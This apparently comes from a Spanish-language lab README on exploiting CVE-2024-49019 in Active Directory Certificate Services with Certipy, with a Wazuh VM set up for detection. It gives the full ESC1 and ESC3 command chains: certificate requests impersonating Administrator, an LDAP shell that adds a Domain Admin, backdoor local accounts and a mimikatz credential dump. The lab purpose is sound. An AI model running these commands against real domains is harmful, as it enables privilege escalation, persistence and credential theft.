
Explotación para CVE-2024-49019
CVE-2024-49019 es una vulnerabilidad en los Servicios de Certificado de Active Directory (AD CS) que permite a un atacante escalar privilegios mediante el uso indebido de la autenticación basada en certificados. Esta guía demuestra cómo explotar esta vulnerabilidad utilizando Certipy.
| Máquina Virtual | Usuario | Contraseña |
|---|---|---|
| Windows Server 2022 | Administrator | !@windowsadmintest101 |
| Windows Server 2022 | testuser | $Vulnerable139 |
| Kali-VM | vagrant | vagrant |
| Ubuntu-Wazuh | wazuh | admin |
La máquina virtual Ubuntu-Wazuh se utiliza con fines de detección. Guía de Detección Mitigación
Primero, clone el repositorio que contiene los archivos necesarios:
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng
Debe instalar Vagrant en su máquina anfitriona antes de continuar.
Descargue e instale Vagrant desde aquí, o instálelo usando PowerShell:
choco install vagrant
sudo apt update && sudo apt install vagrant -y
cd windows-server2022
vagrant up
cd kali-VM
vagrant up
cd WazuhUbuntu
vagrant up
Dado que el exploit requiere una red NAT, configure VirtualBox de la siguiente manera:
Antes de ejecutar el comando a continuación, asegúrese de que VBoxManage esté agregado a sus variables de entorno. Si no es así, ejecute el comando usando su ruta completa:
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Si VBoxManage no se reconoce, use:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Asegúrese de revisar todas las máquinas virtuales en VirtualBox y de que estén asignadas al adaptador de red NatNetwork - NatNet1. Puede crear una red NAT con un nombre diferente, pero debe estar en el rango de IP 10.0.2.0/24.
Antes de continuar, asegúrese de que todas las máquinas virtuales estén encendidas.
Acceda a la máquina virtual Kali Linux para iniciar el ataque y actualice su archivo /etc/hosts:
sudo nano /etc/hosts
Agregue la siguiente entrada:
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
Guarde y salga.
Navegue al directorio CVE-49019 y active el entorno virtual de Python:
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate
Hay dos formas de explotar esta vulnerabilidad: ESC1 y ESC3.
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
add_user badadmin
add_user_to_group badadmin "Domain Admins"
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
Hay una solución alternativa: asegúrese de que su máquina anfitriona tenga la misma hora que el propio Windows Server. Asegúrese de ejecutar este comando para actualizar la máquina virtual Kali-Linux para que tenga la misma hora que Windows-Server.
sudo timedatectl set-ntp off
sudo rdate -n 10.0.2.121
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
Una vez obtenido el acceso a nivel de administrador, el atacante puede:
net user hacked /add
net localgroup "Administrators" hacked /add
sekurlsa::logonpasswords
Para estrategias de detección y mitigación, consulte la guía de detección.
CVE-2024-49019 presenta un riesgo de seguridad significativo debido a su capacidad para permitir la escalada de privilegios no autorizada. Comprender esta vulnerabilidad e implementar mecanismos de detección adecuados, como el uso de Wazuh, es crucial para asegurar los entornos de Active Directory.
Para más información sobre la protección de AD CS, consulte Microsoft Security CVE-2024-49019.